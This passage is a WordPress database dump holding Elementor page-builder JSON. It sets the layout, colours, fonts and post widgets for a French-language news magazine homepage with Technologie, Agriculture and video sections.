"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"etkgpka\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"qhy9zif\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dncgthr\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1536,516,'_elementor_version','0.4'),(1537,516,'_elementor_css','a:3:{s:4:\"time\";i:1508933731;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1539,517,'_elementor_edit_mode','builder'),(1540,517,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"